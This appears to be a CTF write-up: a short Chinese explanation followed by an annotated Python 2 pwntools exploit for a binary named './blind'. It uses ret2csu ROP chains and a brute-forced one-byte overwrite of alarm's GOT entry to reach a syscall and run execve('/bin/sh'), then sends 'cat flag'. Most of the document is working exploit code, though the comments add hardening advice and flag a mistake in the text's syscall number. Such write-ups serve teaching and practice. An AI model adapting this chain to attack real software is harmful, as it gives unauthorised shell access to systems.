利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall。
通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", 0, 0)
exp
#!/usr/bin/env python
# NOTE(review): the original shebang read "#/usr/env/bin python" (missing the
# "!" and with the path components swapped). The script is Python 2 syntax
# (print statements, str payloads) and the pwntools API of that era.
from pwn import *
import time   # unused below; sleep() comes from `from pwn import *`
# Full tube I/O trace; noisy, but useful while brute-forcing one byte.
context.log_level = "debug"
# ret2csu gadget addresses for ./blind. Per the writeup these are the two
# halves of __libc_csu_init (pop-registers tail and mov/call body); the fixed
# 0x4007xx values imply a non-PIE binary. Confirm both in a disassembler
# before relying on them -- they are binary-specific.
gadget1 = 0x4007ba
gadget2 = 0x4007a0
elf = ELF('./blind')
read_got = elf.got['read']
read_plt = elf.plt['read']      # unused below
alarm_plt = elf.plt['alarm']    # unused below
alarm_got = elf.got['alarm']    # write target: lowest byte is brute-forced
bss_addr = elf.bss()            # scratch area that receives the "/bin/sh" string
# Defender's note: this only works because the GOT is writable (partial or
# no RELRO). Linking with full RELRO (-Wl,-z,relro,-z,now) makes the GOT
# read-only after load and removes the overwrite target entirely.
i = 1   # overwritten by `i = 20` before the driver loop below
def exp(off):
    """One brute-force attempt: send the ret2csu chain, then probe for a shell.

    Parameters
    ----------
    off : int
        Candidate value for the lowest byte of alarm's GOT entry. It is
        appended as a single p8() byte and delivered by the 1-byte read the
        chain sets up below.

    Returns None in both outcomes. On success control passes to
    r.interactive() and does not come back until the user leaves it; on a
    miss the function simply returns and leaves the process open (the caller
    never closes it on this path).

    Uses module globals: r (the pwntools tube), gadget1/gadget2, read_got,
    alarm_got, bss_addr.
    """
    # 0x58 bytes of filler -- presumably reaches the saved return address of
    # the vulnerable function; the offset is not derivable from this file.
    payload = 'a' * 0x58
    # --- chain #1: per the writeup, read(0, &alarm@got, 1) ----------------
    # gadget1 is assumed to be the pop rbx/rbp/r12..r15 tail of
    # __libc_csu_init and gadget2 its "mov ...; call [r12+rbx*8]" body. The
    # register->argument mapping of the triplet depends on the glibc build
    # and is taken on trust from the author.
    payload += p64(gadget1)
    payload += p64(0) + p64(1) + p64(read_got)      # rbx=0, rbp=1, r12=&read@got
    payload += p64(1) + p64(alarm_got) + p64(0)     # 1 byte, into alarm@got, from fd 0
    payload += p64(gadget2)
    # --- chain #2: read(0, bss, 0x3b) ----------------------------------------
    # The return value of read() leaves rax == 0x3b, the x86-64 execve syscall
    # number (the writeup text says 0x5b; the code's 0x3b is the right value).
    payload += p64(gadget1)
    payload += p64(0) + p64(1) + p64(read_got)
    payload += p64(0x3b) + p64(bss_addr) + p64(0)
    payload += p64(gadget2)
    # --- chain #3: call through alarm@got ------------------------------------
    # If the guessed byte was right, alarm@got now points at a `syscall`
    # instruction and this becomes execve(bss, 0, 0) per the writeup.
    payload += p64(gadget1)
    payload += p64(0) + p64(1) + p64(alarm_got)
    payload += p64(0) + p64(0) + p64(bss_addr)
    payload += p64(gadget2)
    # Pad to 0x500 so the overflowing read consumes exactly this much
    # (assumes the vulnerable read's count is 0x500 -- confirm in the binary).
    # Everything appended after the pad is consumed by the two chained reads.
    payload = payload.ljust(0x500, '\x00')
    payload += p8(off)                               # -> low byte of alarm@got
    payload += "/bin/sh\x00" + 'a' * (0x3b - 8)      # exactly 0x3b bytes -> bss
    #gdb.attach(r)
    #pause()
    r.send(payload)
    sleep(1)
    # Probe: a live shell echoes the string back; a crashed process instead
    # makes recv() raise (presumably EOFError), which the caller's except
    # clause absorbs.
    r.sendline("echo hello!")
    s = r.recv(10)
    print s
    if "hello" in s:
        r.sendline("ls")
        r.sendline("cat flag")
        r.interactive()
    else:
        return
# Brute-force driver: one fresh process per guess. The first value tried is
# 21 (i is incremented before the call); the earlier `i = 1` is discarded.
# There is no upper bound on i -- presumably p8() rejects values above 255,
# at which point the loop ends through the except path.
i = 20
while True:
    try:
        global r   # no-op at module level; r is already a module global
        r = process("./blind")
        i += 1
        exp(i)
        # Reached only when exp() returns: the probe missed, or the user left
        # r.interactive(). The child is NOT closed on the miss path, so each
        # miss leaks a running process until the next exception.
        print i
    except:
        # NOTE(review): a bare except also swallows KeyboardInterrupt, so
        # Ctrl-C does not stop the loop cleanly; `except EOFError:` would be
        # the narrower form for the "process died" case. If process() itself
        # raised on the very first iteration, r is still unbound here and
        # r.close() raises NameError, ending the loop.
        r.close()
        print 'trying...'